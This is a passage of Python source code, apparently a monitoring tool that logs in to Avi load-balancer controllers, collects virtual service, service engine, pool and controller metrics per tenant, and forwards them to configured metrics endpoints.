self.payload_template['avicontroller'] = self.avi_cluster_name
if controller_config.get('tags') != None:
for k,v in controller_config['tags'].items():
self.payload_template[k] = v
if controller_config.get('metrics_endpoint_config') == None:
if global_endpoint_config != None:
self.endpoint_list = determine_endpoint_type(global_endpoint_config)
else:
self.endpoint_list = determine_endpoint_type([])
else:
self.endpoint_list = determine_endpoint_type(controller_config['metrics_endpoint_config'])
#------
if 'virtualservice_stats_config' in controller_config and controller_config.get('virtualservice_stats_config').get('virtualservice_realtime') == True:
self.vs_realtime = True
else:
self.vs_realtime = False
if 'serviceengine_stats_config' in controller_config and controller_config.get('serviceengine_stats_config').get('serviceengine_realtime') == True:
self.se_realtime = True
else:
self.se_realtime = False
if 'pool_stats_config' in controller_config and controller_config.get('pool_stats_config').get('pool_realtime') == True:
self.pool_realtime = True
else:
self.pool_realtime = False
#------
if 'virtualservice_stats_config' in controller_config and controller_config.get('virtualservice_stats_config').get('virtualservice_runtime') == True:
self.vs_runtime = True
else:
self.vs_runtime = False
if 'serviceengine_stats_config' in controller_config and controller_config.get('serviceengine_stats_config').get('serviceengine_runtime') == True:
self.se_runtime = True
else:
self.se_runtime = False
if 'pool_stats_config' in controller_config and controller_config.get('pool_stats_config').get('pool_runtime') == True:
self.pool_runtime = True
else:
self.pool_runtime = False
if 'controller_stats_config' in controller_config and controller_config.get('controller_stats_config').get('controller_runtime') == True:
self.controller_runtime = True
else:
self.controller_runtime = False
#------ PRINT CONFIGURATION ------
print('-------------------------------------------------------------------')
print('============ CONFIGURATION FOR: '+avi_cluster_name+':'+self.avi_cluster_ip+ ' ============')
if 'virtualservice_stats_config' in controller_config and controller_config.get('virtualservice_stats_config').get('virtualservice_metrics') == True:
self.vs_metrics = True
print('VIRTUALSERVICE METRICS: True')
else:
self.vs_metrics = False
print('VIRTUALSERVICE METRICS: False')
print('VIRTUALSERVICE REALTIME METRICS: ' +str(self.vs_realtime))
print('VIRTUALSERVICE RUNTIME: '+str(self.vs_runtime))
#------
if 'serviceengine_stats_config' in controller_config and controller_config.get('serviceengine_stats_config').get('serviceengine_metrics') == True:
self.se_metrics = True
print('SERVICEENGINE METRICS: True')
else:
self.se_metrics = False
print('SERVICEENGINE METRICS: False')
print('SERVICEENGINE REALTIME METRICS: ' +str(self.se_realtime))
print('SERVICEENGINE RUNTIME: '+str(self.se_runtime))
#------
if 'pool_stats_config' in controller_config and controller_config.get('pool_stats_config').get('pool_metrics') == True:
self.pool_metrics = True
print('POOL METRICS: True')
else:
self.pool_metrics = False
print('POOL METRICS: False')
print('POOL REALTIME METRICS: ' +str(self.pool_realtime))
print('POOL RUNTIME: '+str(self.pool_runtime))
#------
if 'controller_stats_config' in controller_config and controller_config.get('controller_stats_config').get('controller_metrics') == True:
self.controller_metrics = True
print('CONTROLLER METRICS: True')
else:
self.controller_metrics = False
print('CONTROLLER METRICS: False')
print('CONTROLLER RUNTIME: '+str(self.controller_runtime))
print('-------------------------------------------------------------------')
print('-------------------------------------------------------------------')
#------
self.vs_metric_list = [
'l4_client.apdexc',
'l4_client.avg_bandwidth',
'l4_client.avg_application_dos_attacks',
'l4_client.avg_complete_conns',
'l4_client.avg_connections_dropped',
'l4_client.avg_new_established_conns',
'l4_client.avg_policy_drops',
'l4_client.avg_rx_pkts',
'l4_client.avg_tx_pkts',
'l4_client.avg_rx_bytes',
'l4_client.avg_tx_bytes',
'l4_client.max_open_conns',
'l4_client.avg_lossy_connections',
'l7_client.avg_complete_responses',
'l7_client.avg_client_data_transfer_time',
'l7_client.avg_client_txn_latency',
'l7_client.sum_application_response_time',
'l7_client.avg_resp_4xx_avi_errors',
'l7_client.avg_resp_5xx_avi_errors',
'l7_client.avg_resp_2xx',
'l7_client.avg_resp_4xx',
'l7_client.avg_resp_5xx',
'l4_client.avg_total_rtt',
'l7_client.avg_page_load_time',
'l7_client.apdexr',
'l7_client.avg_ssl_handshakes_new',
'l7_client.avg_ssl_connections',
'l7_client.sum_get_reqs',
'l7_client.sum_post_reqs',
'l7_client.sum_other_reqs',
'l7_client.avg_frustrated_responses',
'l7_client.avg_waf_attacks',
'l7_client.pct_waf_attacks',
'l7_client.sum_total_responses',
'l7_client.avg_waf_rejected',
'l7_client.avg_waf_evaluated',
'l7_client.avg_waf_matched',
'l7_client.avg_waf_disabled',
'l7_client.pct_waf_disabled',
'l7_client.avg_http_headers_count',
'l7_client.avg_http_headers_bytes',
'l7_client.pct_get_reqs',
'l7_client.pct_post_reqs',
'l7_client.avg_http_params_count',
'l7_client.avg_uri_length',
'l7_client.avg_post_bytes',
'dns_client.avg_complete_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_tcp_queries',
'dns_client.avg_udp_queries',
'dns_client.avg_udp_passthrough_resp_time',
'dns_client.avg_unsupported_queries',
'dns_client.pct_errored_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_avi_errors',
'dns_server.avg_complete_queries',
'dns_server.avg_errored_queries',
'dns_server.avg_tcp_queries',
'dns_server.avg_udp_queries',
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
#------
self.se_metric_list = [
'se_if.avg_bandwidth',
'se_stats.avg_connection_mem_usage',
'se_stats.avg_connections',
'se_stats.avg_connections_dropped',
'se_stats.avg_cpu_usage',
'se_stats.avg_disk1_usage',
'se_stats.avg_mem_usage',
'se_stats.avg_dynamic_mem_usage',
'se_stats.avg_persistent_table_usage',
'se_stats.avg_rx_bandwidth',
'se_if.avg_rx_bytes',
'se_if.avg_rx_pkts',
'se_if.avg_rx_pkts_dropped_non_vs',
'se_if.avg_tx_pkts',
'se_if.avg_tx_bytes',
'se_stats.avg_ssl_session_cache_usage',
'se_if.avg_connection_table_usage',
'se_stats.max_se_bandwidth',
'se_stats.avg_eth0_bandwidth',
'se_stats.pct_syn_cache_usage',
'se_stats.avg_packet_buffer_usage',
'se_stats.avg_packet_buffer_header_usage',
'se_stats.avg_packet_buffer_large_usage',
'se_stats.avg_packet_buffer_small_usage',
'healthscore.health_score_value'
]
#------
self.controller_metric_list = [
'controller_stats.avg_cpu_usage',
'controller_stats.avg_disk_usage',
'controller_stats.avg_mem_usage']
#----
self.pool_server_metric_list = [
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
def avi_login(self):
try:
login = pickle.load(open((os.path.join(fdir,self.avi_cluster_ip)),'rb'))
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "admin", 'content-type': 'application/json'})
resp = requests.get('https://%s/api/cluster' %self.avi_cluster_ip, verify=False, headers = headers,cookies=cookies,timeout=5)
if resp.status_code == 200:
return login
else:
login = requests.post('https://%s/login' %self.avi_cluster_ip, verify=False, data={'username': self.avi_user, 'password': self.avi_pass},timeout=15)
pickle.dump(login, open((os.path.join(fdir,self.avi_cluster_ip)),'wb'))
return login
except:
try:
login = requests.post('https://%s/login' %self.avi_cluster_ip, verify=False, data={'username': self.avi_user, 'password': self.avi_pass},timeout=15)
pickle.dump(login, open((os.path.join(fdir,self.avi_cluster_ip)),'wb'))
return login
except requests.exceptions.Timeout:
class timedout:pass
login = timedout()
login.status_code = 'timedout'
return login
def avi_request(self,avi_api,tenant,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in self.login.cookies.keys():
cookies['avi-sessionid'] = self.login.cookies['avi-sessionid']
else:
cookies['sessionid'] = self.login.cookies['sessionid']
headers = ({'X-Avi-Tenant': '%s' %tenant, 'content-type': 'application/json', 'X-Avi-Version': '%s' %api_version})
return requests.get('https://%s/api/%s' %(self.avi_controller,avi_api), verify=False, headers = headers,cookies=cookies,timeout=50)
def avi_post(self,api_url,tenant,payload,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in self.login.cookies.keys():
cookies['avi-sessionid'] = self.login.cookies['avi-sessionid']
else:
cookies['sessionid'] = self.login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "%s" %tenant, 'content-type': 'application/json','referer': 'https://%s' %self.avi_controller, 'X-CSRFToken': dict(self.login.cookies)['csrftoken'],'X-Avi-Version':'%s' %api_version})
cookies['csrftoken'] = self.login.cookies['csrftoken']
return requests.post('https://%s/api/%s' %(self.avi_controller,api_url), verify=False, headers = headers,cookies=cookies, data=json.dumps(payload),timeout=50)
#----- Tries to determine a follower controller to poll
def controller_to_poll(self):
cookies=dict()
if 'avi-sessionid' in self.login.cookies.keys():
cookies['avi-sessionid'] = self.login.cookies['avi-sessionid']
else:
cookies['sessionid'] = self.login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "admin", 'content-type': 'application/json'})
resp = (requests.get('https://%s/api/%s' %(self.avi_cluster_ip,'cluster/runtime'), verify=False, headers = headers,cookies=cookies,timeout=50)).json()
follower_list = []
if len(resp['node_states']) > 1:
for c in resp['node_states']:
if c['state'] == 'CLUSTER_ACTIVE' and c['role'] == 'CLUSTER_FOLLOWER':
follower_list.append(c['mgmt_ip'])
if len(follower_list) == 0:
return self.avi_cluster_ip
else:
return sorted(follower_list)[0]
else:
return self.avi_cluster_ip
#----- Creates inventory dicts to be used by other methods
def gen_inventory_dict(self):
try:
start_time = time.time()
#------
vs_dict = {}
se_dict = {}
pool_dict = {}
seg_dict = {}
#------
if self.vs_runtime == True:
vs_runtime = '&join_subresources=runtime'
else:
vs_runtime = ''
if self.se_runtime == True:
se_runtime = '&join_subresources=runtime'
else:
se_runtime = ''
#------
for t in self.tenants:
if self.vs_metrics == True or self.vs_runtime == True:
vs_inv = self.avi_request('virtualservice?fields=cloud_ref,tenant_ref,se_group_ref&page_size=200&include_name=true&'+vs_runtime,t['name'])
if vs_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: virtualservice_inventory: %s' %vs_inv.text)
else:
vs_inv = vs_inv.json()
resp = vs_inv
page_number = 1
while 'next' in resp:
page_number += 1
resp = self.avi_request('virtualservice?fields=cloud_ref,tenant_ref,se_group_ref&page_size=200&include_name=true&page='+str(page_number)+vs_runtime,t['name']).json()
for v in resp['results']:
vs_inv['results'].append(v)
if vs_inv['count'] > 0:
for v in vs_inv['results']:
vs_dict[v['uuid']] = {}
vs_dict[v['uuid']]['name'] = v['name']
vs_dict[v['uuid']]['tenant'] = v['tenant_ref'].rsplit('#')[1]
vs_dict[v['uuid']]['cloud'] = v['cloud_ref'].rsplit('#')[1]
vs_dict[v['uuid']]['se_group'] = v['se_group_ref'].rsplit('#')[1]
vs_dict[v['uuid']]['results'] = v
#---------------
if self.se_metrics == True or self.se_runtime == True:
se_inv = self.avi_request('serviceengine?fields=cloud_ref,tenant_ref,se_group_ref,vs_refs&page_size=200&include_name=true'+se_runtime,t['name'])
if se_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: serviceengine_inventory: %s' %se_inv.text)
else:
se_inv = se_inv.json()
resp = se_inv
page_number = 1
while 'next' in resp:
page_number += 1
resp = self.avi_request('serviceengine?fields=cloud_ref,tenant_ref,se_group_ref,vs_refs&page_size=200&include_name=true&page='+str(page_number)+se_runtime,t['name']).json()
for s in resp['results']:
se_inv['results'].append(s)
if se_inv['count'] > 0:
for s in se_inv['results']:
se_dict[s['uuid']] = {}
se_dict[s['uuid']]['name'] = s['name']
se_dict[s['uuid']]['tenant'] = s['tenant_ref'].rsplit('#')[1]
se_dict[s['uuid']]['cloud'] = s['cloud_ref'].rsplit('#')[1]
se_dict[s['uuid']]['se_group'] = s['se_group_ref'].rsplit('#')[1]
se_dict[s['uuid']]['se_group_uuid'] = s['se_group_ref'].split('/serviceenginegroup/')[1].rsplit('#')[0]
se_dict[s['uuid']]['results'] = s
se_dict[s['uuid']]['virtualservices'] = []
if 'vs_refs' in s:
for v in s['vs_refs']:
se_dict[s['uuid']]['virtualservices'].append(v.rsplit('#',1)[1])
else:
se_dict[s['uuid']]['virtualservices'] = []
#---------------
if self.pool_metrics == True or self.pool_runtime == True:
pool_inv = self.avi_request('pool-inventory?include_name=true&page_size=200',t['name'])
if pool_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: pool_inventory: %s' %pool_inv.text)
else:
pool_inv = pool_inv.json()
resp = pool_inv
page_number = 1
while 'next' in resp:
page_number += 1
resp = self.avi_request('pool-inventory?include_name=true&page_size=200&page='+str(page_number),t['name']).json()
for p in resp['results']:
pool_inv['results'].append(p)
if pool_inv['count'] > 0:
for p in pool_inv['results']:
pool_dict[p['uuid']] = {}
pool_dict[p['uuid']]['name'] = p['config']['name']
pool_dict[p['uuid']]['tenant'] = p['config']['tenant_ref'].rsplit('#')[1]
pool_dict[p['uuid']]['cloud'] = p['config']['cloud_ref'].rsplit('#')[1]
pool_dict[p['uuid']]['results'] = p
#---------------
seg_inv = self.avi_request('serviceenginegroup?fields=max_vs_per_se,cloud_ref,tenant_ref&include_name&page_size=200',t['name'])
if seg_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: serviceengine_group_inventory: %s' %seg_inv.text)
else:
seg_inv = seg_inv.json()
if seg_inv['count'] > 0:
for seg in seg_inv['results']:
seg_dict[seg['uuid']] = {}
seg_dict[seg['uuid']]['name'] = seg['name']
seg_dict[seg['uuid']]['cloud'] = seg['cloud_ref'].rsplit('#')[1]
seg_dict[seg['uuid']]['tenant'] = seg['tenant_ref'].rsplit('#')[1]
seg_dict[seg['uuid']]['max_vs_per_se'] = seg['max_vs_per_se']
seg_dict[seg['uuid']]['results'] = seg
temp_total_time = str(time.time()-start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func gen_inventory_dict completed, executed in '+temp_total_time+' seconds')
return vs_dict, se_dict, pool_dict, seg_dict
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func gen_inventory_dict encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
sys.exit(1)
#-----------------------------------
#----- Remove unavailable metrics for current version
def remove_version_specific_metrics(self):
try:
#----- Generate List of Available Metrics
available_metrics = {}
resp = self.avi_request('analytics/metric_id',self.tenants[0]['name']).json()
vs_metrics = []
se_metrics = []
pool_server_metrics = []
controller_metrics = []
for m in resp['results']:
available_metrics[m['name']]=m['entity_types']
if 'virtualservice_stats_config' in self.controller_config and self.controller_config.get('virtualservice_stats_config').get('virtualservice_metrics_list') != None:
for vm in self.controller_config['virtualservice_stats_config']['virtualservice_metrics_list']:
vm = vm.replace(' ','').lower()
if vm in available_metrics:
if 'virtualservice' in available_metrics[vm]:
vs_metrics.append(vm)
else:
for vm in self.vs_metric_list:
if vm in available_metrics:
if 'virtualservice' in available_metrics[vm]:
vs_metrics.append(vm)
#------
if 'serviceengine_stats_config' in self.controller_config and self.controller_config.get('serviceengine_stats_config').get('serviceengine_metrics_list') != None:
for sm in self.controller_config['serviceengine_stats_config']['serviceengine_metrics_list']:
sm = sm.replace(' ','').lower()
if sm in available_metrics:
if 'serviceengine' in available_metrics[sm]:
se_metrics.append(sm)
else:
for sm in self.se_metric_list:
if sm in available_metrics:
if 'serviceengine' in available_metrics[sm]:
se_metrics.append(sm)
#------
if 'controller_stats_config' in self.controller_config and self.controller_config.get('controller_stats_config').get('controller_metrics_list') != None:
for cm in self.controller_config['controller_stats_config']['controller_metrics_list']:
cm = cm.replace(' ','').lower()
if cm in available_metrics:
if 'cluster' in available_metrics[cm]:
controller_metrics.append(cm)
else:
for cm in self.controller_metric_list:
if cm in available_metrics:
if 'cluster' in available_metrics[cm]:
controller_metrics.append(cm)
#------
if 'pool_stats_config' in self.controller_config and self.controller_config.get('pool_stats_config').get('pool_metrics_list') != None:
for pm in self.controller_config['pool_stats_config']['pool_metrics_list']:
pm = pm.replace(' ','').lower()
if pm in available_metrics:
if 'pool' in available_metrics[pm]:
pool_server_metrics.append(pm)
else:
for pm in self.pool_server_metric_list:
if pm in available_metrics:
if 'pool' in available_metrics[pm]:
pool_server_metrics.append(pm)
#------
vs_metric_list = ','.join(vs_metrics)
se_metric_list = ','.join(se_metrics)
controller_metric_list = ','.join(controller_metrics)
pool_server_metric_list = ','.join(pool_server_metrics)
return vs_metric_list, se_metric_list, controller_metric_list, pool_server_metric_list
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': remove_version_specific_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- Add Test functions
#-----------------------------------
def srvc_engn_vs_count(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
for s in self.se_dict:
if len(self.se_dict[s]['virtualservices']) > 0:
temp_payload = self.payload_template.copy()
temp_payload['metric_type'] = 'serviceengine_vs_count'
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_vs_count'
temp_payload['metric_name'] = 'vs_count'
temp_payload['metric_value'] = len(self.se_dict[s]['virtualservices'])
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||vs_count' %self.se_dict[s]['name']
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_vs_count completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_vs_count encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def srvc_engn_count(self):
try:
temp_start_time = time.time()
se_count = 0
for s in self.se_dict:
if 'name' in self.se_dict[s]:
se_count += 1
endpoint_payload_list = []
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'serviceengine_count'
temp_payload['metric_name'] = 'count'
temp_payload['metric_value'] = se_count
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||count'
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_count completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_count encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def srvc_engn_stats_threaded(self):
proc = []
for t in self.tenants:
p = Process(target = self.srvc_engn_stats, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
def srvc_engn_stats(self,tenant):
try:
temp_start_time = time.time()
endpoint_payload_list = []
payload = {
"metric_requests": [
{
"step": 300,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"se_uuid": "*",
"id": "collItemRequest:AllSEs",
"metric_id": self.se_metric_list
}
]}
se_stat = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
if self.se_realtime == True:
payload = {
"metric_requests": [
{
"step": 5,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"se_uuid": "*",
"id": "collItemRequest:AllSEs",
"metric_id": self.se_metric_list
}
]}
realtime_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
for s in se_stat['series']['collItemRequest:AllSEs']:
if s in self.se_dict:
se_name = self.se_dict[s]['name']
_tenant = self.se_dict[s]['tenant']
if tenant == 'admin' or (tenant !='admin' and _tenant != 'admin'):
for entry in se_stat['series']['collItemRequest:AllSEs'][s]:
if 'data' in entry:
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = se_name
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_metrics'
temp_payload['metric_name'] = entry['header']['name']
temp_payload['metric_value'] = entry['data'][0]['value']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||%s' %(se_name, entry['header']['name'])
if self.se_realtime == True:
if 'series' in realtime_stats:
if s in realtime_stats['series']['collItemRequest:AllSEs']:
for n in realtime_stats['series']['collItemRequest:AllSEs'][s]:
if n['header']['name'] == entry['header']['name']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_stats completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_stats encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#--- This function will loop through all tenants pulling the following statistics
#--- for all Virtual Services.
def virtual_service_stats_threaded(self):
proc = []
for t in self.tenants:
p = Process(target = self.virtual_service_stats, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
def virtual_service_stats(self,tenant):
try:
temp_start_time = time.time()
#-----
endpoint_payload_list = []
payload = {'metric_requests': [{'step' : 300, 'limit': 1, 'id': 'allvs', 'entity_uuid' : '*', 'metric_id': self.vs_metric_list}]}
vs_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
#----- this pulls 5 sec avg stats for vs that have realtime stats enabled
if self.vs_realtime == True:
payload = {'metric_requests': [{'step' : 5, 'limit': 1, 'id': 'allvs', 'entity_uuid' : '*', 'metric_id': self.vs_metric_list}]}
realtime_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
#-----
for v in vs_stats['series']['allvs']:
if v in self.vs_dict:
vs_uuid = v
vs_name = self.vs_dict[vs_uuid]['name']
_tenant = self.vs_dict[vs_uuid]['tenant']
if tenant == 'admin' or (tenant !='admin' and _tenant != 'admin'):
for m in vs_stats['series']['allvs'][v]:
metric_name = m['header']['name']
if 'data' in m:
temp_payload = self.payload_template.copy().copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = _tenant
temp_payload['cloud'] = self.vs_dict[vs_uuid]['cloud']
temp_payload['se_group'] = self.vs_dict[vs_uuid]['se_group']
temp_payload['metric_type'] = 'virtualservice_metrics'
temp_payload['metric_name'] = metric_name
temp_payload['metric_value'] = m['data'][0]['value']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||%s' %(vs_name, metric_name)
if self.vs_realtime == True:
if 'series' in realtime_stats:
if v in realtime_stats['series']['allvs']:
for n in realtime_stats['series']['allvs'][v]:
if n['header']['name'] == m['header']['name']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_stats completed for tenant: '+tenant+', executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_stats encountered an error for tenant '+tenant)
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
def vs_metrics_per_se_threaded(self):
try:
temp_start_time = time.time()
major,minor = self.login.json()['version']['Version'].rsplit('.',1)
if (float(major) >= 17.2 and float(minor) >= 8) or float(major) >= 18.1:
proc = []
for t in self.tenants:
p = Process(target = self.vs_metrics_per_se, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_metrics_per_se_threaded completed, executed in '+temp_total_time+' seconds')
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
def vs_metrics_per_se(self,tenant):
try:
temp_start_time = time.time()
endpoint_payload_list = []
payload = {'metric_requests': [{'step' : 300, 'limit': 1, 'id': 'vs_metrics_by_se', 'entity_uuid' : '*', 'serviceengine_uuid': '*', 'include_refs': True, 'metric_id': self.vs_metric_list}]}
vs_stats = self.avi_post('analytics/metrics/collection?include_name=true&pad_missing_data=false', tenant, payload).json()
#----- this will pull 5 sec stats for vs that have realtime stat enabled
if self.vs_realtime == True:
payload = {'metric_requests': [{'step' : 5, 'limit': 1, 'id': 'vs_metrics_by_se', 'entity_uuid' : '*', 'serviceengine_uuid': '*', 'include_refs': True, 'metric_id': self.vs_metric_list}]}
realtime_stats = self.avi_post('analytics/metrics/collection?include_name=true&pad_missing_data=false', tenant, payload).json()
#------
if len(vs_stats['series']['vs_metrics_by_se']) > 0:
for entry in vs_stats['series']['vs_metrics_by_se']:
if entry in self.vs_dict:
vs_name = self.vs_dict[entry]['name']
_tenant = self.vs_dict[entry]['tenant']
if tenant == 'admin' or (tenant !='admin' and _tenant != 'admin'):
for d in vs_stats['series']['vs_metrics_by_se'][entry]:
if 'data' in d:
if 'serviceengine_ref' in d['header']:
se_name = d['header']['serviceengine_ref'].rsplit('#',1)[1]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = se_name
temp_payload['tenant'] = self.vs_dict[entry]['tenant']
temp_payload['cloud'] = self.vs_dict[entry]['cloud']
temp_payload['se_group'] = self.vs_dict[entry]['se_group']
temp_payload['vs_name'] = vs_name
temp_payload['metric_type'] = 'virtualservice_metrics_per_serviceengine'
#temp_payload['metric_name'] = d['header']['name']
temp_payload['metric_value'] = d['data'][0]['value']
if self.vs_realtime == True:
if 'series' in realtime_stats:
if entry in realtime_stats['series']['vs_metrics_by_se']:
for n in realtime_stats['series']['vs_metrics_by_se'][entry]:
if n['header']['name'] == d['header']['name'] and n['header']['serviceengine_ref'] == d['header']['serviceengine_ref']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
metric_name = d['header']['name']
temp_payload['metric_name'] = metric_name+'_per_se'
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||virtualservice_stats||%s||%s' %(se_name,vs_name,temp_payload['metric_name'])
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_metrics_per_se completed tenant: '+tenant+', executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_metrics_per_se for tenant: '+tenant+', encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#----- VS UP/DOWN/Enabled/Disabled STATUS
def vs_oper_status(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
vs_up_count = 0
vs_down_count = 0
vs_disabled_count = 0
vs_count=0
for v in self.vs_dict:
vs_name = self.vs_dict[v]['name']
vs_count += 1
metric_name = 'oper_status'
if self.vs_dict[v]['results']['runtime']['oper_status']['state'] == 'OPER_UP':
metric_value = 2
vs_up_count += 1
elif self.vs_dict[v]['results']['runtime']['oper_status']['state'] == 'OPER_DISABLED':
metric_value = 1
vs_disabled_count += 1
else:
metric_value = 0
vs_down_count += 1
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = self.vs_dict[v]['tenant']
temp_payload['cloud'] = self.vs_dict[v]['cloud']
temp_payload['se_group'] = self.vs_dict[v]['se_group']
temp_payload['metric_type'] = 'virtualservice_operstatus'
temp_payload['metric_name'] = 'oper_status'
temp_payload['metric_value'] = metric_value
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||%s' %(vs_name, metric_name)
endpoint_payload_list.append(temp_payload)
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
#----- Total VS
a = temp_payload.copy()
a['metric_name'] = 'count'
a['metric_value'] = vs_count
a['metric_type'] = 'virtualservice_count'
a['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||count'
endpoint_payload_list.append(a)
